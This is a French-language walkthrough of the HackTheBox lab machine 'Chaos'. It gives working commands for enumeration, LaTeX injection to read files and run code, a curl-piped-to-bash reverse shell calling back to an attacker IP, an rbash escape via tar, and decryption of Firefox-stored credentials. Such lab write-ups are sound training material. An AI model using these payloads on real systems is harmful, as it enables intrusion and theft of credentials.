Chaos HackTheBox (Writeup)

Skills:

Password Guessing
Abusing e-mail service (claws-mail)
Crypto Challenge (Decrypt Secret Message - AES Encrypted)
LaTeX Injection (RCE)
Bypassing rbash (Restricted Bash)
Extracting Credentials from Firefox Profile

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

nmap -p- --open -sS -n -Pn --min-rate 5000 -vvvv 10.10.10.120 -oG allPorts

Analyse des ports ouverts avec extractPorts (80,110,143,993,995,10000)

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le clipboard.

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p80,110,143,993,995,10000 10.10.10.120 -oN targeted

Exploitation

Port 80 - Web Enumeration

L'accès direct via l'IP est bloqué. Nous ajoutons donc le domaine chaos.htb dans /etc/hosts.

Fuzzing des Directoires

gobuster dir -u http://chaos.htb/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -r

Aucun résultat.

Fuzzing via l'adresse IP :

gobuster dir -u http://10.10.10.120 -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -r

Nous trouvons un dossier /wp indiquant WordPress.

Ajout du sous-domaine wordpress.chaos.htb dans /etc/hosts.

WordPress Enumeration

Nous trouvons un utilisateur Human sur WordPress.

Password Guessing

Un article WordPress contient un mot de passe. Nous testons Human et cela fonctionne.

Nous trouvons des identifiants pour un webmail :

username: ayush
password: jiujitsu

Port 993/995 - Webmail

Le port 993 indique un serveur de mail IMAP.

Nous utilisons claws-mail pour accéder à la boîte mail d'Ayush.

claws-mail

Dans un mail, nous trouvons deux fichiers attachés et le message :

Salut, Sahay
Vérifie le fichier enmsg.txt. Tu es le mot de passe XD. J’ai aussi joint le script que j’ai utilisé pour chiffrer. Merci

Decrypt Secret Message - AES Encrypted

Nous avons identifié un script decrypt.py sur GitHub, qui appartient au même projet

File-Encryption-Script/decrypt.py at master · vj0shii/File-Encryption-ScriptGitHub

On execute:

python3 decrypt.py
Enter filename: ./enim_msg.txt
Enter password: sahay

Le contenu est décodé avec base64 :

cat im_msg.txt | base64 -d; echo

Le message révèle un service LaTeX sur http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3

Salut Sahay,
Veuillez découvrir notre nouveau service qui crée des PDF.
P.S. – Comme tu me l'as conseillé, j'ai chiffré le message important. 😊
http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3
Contrôles de blocage
Merci, Ayush
Thanks, Ayush

LaTeX Injection Vulnerabilité

LaTeX Injection (file reader)

Nous interceptons la requête

Document PDF LaTeX:

Nous injectons :

\input{/etc/passwd}
\include{password}

Exploitation RCE via LaTeX

Nous exécutons une commande id via :

\immediate\write18{id > output}
\newread\file
\openin\file=output
\read\file to\line
\text{\line}
\closein\file

Reverse Shell

Nous écoutons sur le port 443 :

nc -nvlp 443

Nous créons un script bash index.html :

 #!/bin/bash
 bash -i >& /dev/tcp/10.10.14.61/443 0>&1

Nous lançons un serveur web :

python3 -m http.server 80

Injection du payload :

\immediate\write18{curl http://10.10.14.61 | bash > output}
\newread\file
\openin\file=output
\read\file to\line
\text{\line}
\closein\file

Élévation de Privilège

Pivoting User Ayush - Bypass rbash

Nous nous connectons en tant qu’Ayush, mais nous sommes limités à une shell rbash.

Liste des commandes disponibles :

compgen -c

Nous trouvons tar et contournons rbash avec :

tar | GTFOBinsgtfobins.github.io

tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec/bin/bash
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Flag user.txt :)

Nous obtenons l’accès à un shell complet et récupérons user.txt.

Extraction des Credentials Firefox

Dans le dossier .mozilla d’Ayush, nous trouvons key4.db et logins.json.

Nous les transférons vers notre machine :

python3 -m http.server 8080
wget -r chaos.htb:8080

Déchiffrement des identifiants avec firefox_decrypt.py :

GitHub - unode/firefox_decrypt: Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox™, Waterfox™, Thunderbird®, SeaMonkey®) profilesGitHub

python3 firefox_decrypt.py chaos.htb:8080

Nous entrons jiujitsu comme mot de passe principal et récupérons :

Mot de passe principal pour le profil chaos.htb:8080/bzo7sjt1.default
Website: https://chaos.htb:10000
Username: 'root' Password: 'Thiv8wrej~

Connexion en tant que root :

Flag root.txt

Mis à jour il y a 1 an

hashtagReconnaissance:

hashtagExploitation

hashtagPort 80 - Web Enumeration

hashtagFuzzing des Directoires

hashtagWordPress Enumeration

hashtagPassword Guessing

hashtagPort 993/995 - Webmail

hashtagDecrypt Secret Message - AES Encrypted

hashtagOn execute:

hashtagLaTeX Injection Vulnerabilité

hashtagLaTeX Injection (file reader)

hashtagDocument PDF LaTeX:

hashtagExploitation RCE via LaTeX

hashtagReverse Shell

hashtagÉlévation de Privilège

hashtagPivoting User Ayush - Bypass rbash

hashtagFlag user.txt :)

hashtagExtraction des Credentials Firefox

hashtagFlag root.txt